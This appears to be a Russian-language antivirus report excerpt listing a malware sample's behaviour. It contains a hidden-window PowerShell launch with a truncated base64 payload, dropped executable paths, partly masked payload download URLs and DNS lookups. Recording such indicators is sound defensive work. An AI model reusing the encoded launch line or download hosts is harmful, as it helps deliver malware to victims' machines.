Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAG8AMQByAHoAYwA2AD0AKAAoACcASwB6ACcAKwAnADcAYgAnACkAKwAnAHoAJwArACcAbgBiACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgBWADoAdQBzAGUAUgBwAFIATwBGAGkATABFAFwAeABtAE...
- %HOMEPATH%\xmejmeo\txfhu9z\d3coi0.exe
- %HOMEPATH%\xmejmeo\txfhu9z\d3coi0.exe
- %HOMEPATH%\xmejmeo\txfhu9z\d3coi0.exe
- http://vi#####ecoracion.com/wp-admin/MIH/
- http://va###ast.com/bleech/fR/
- http://va###oda.com/cgi-bin/897/
- http://wa###-tanka.org/Kleinteile/E/
- http://wh####on-rice.com/Logos/U/
- http://za#####t-flensburg.com/cgi-bin/L8/
- DNS ASK vi#####ecoracion.com
- DNS ASK va###ast.com
- DNS ASK va###oda.com
- DNS ASK wa###-tanka.org
- DNS ASK we####t4christ.org
- DNS ASK wh####on-rice.com
- DNS ASK za#####t-flensburg.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAG8AMQByAHoAYwA2AD0AKAAoACcASwB6ACcAKwAnADcAYgAnACkAKwAnAHoAJwArACcAbgBiACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgBWADoAdQBzAGUAUgBwAFIATwBGAGkATABFAFwAeABtAE...' (со скрытым окном)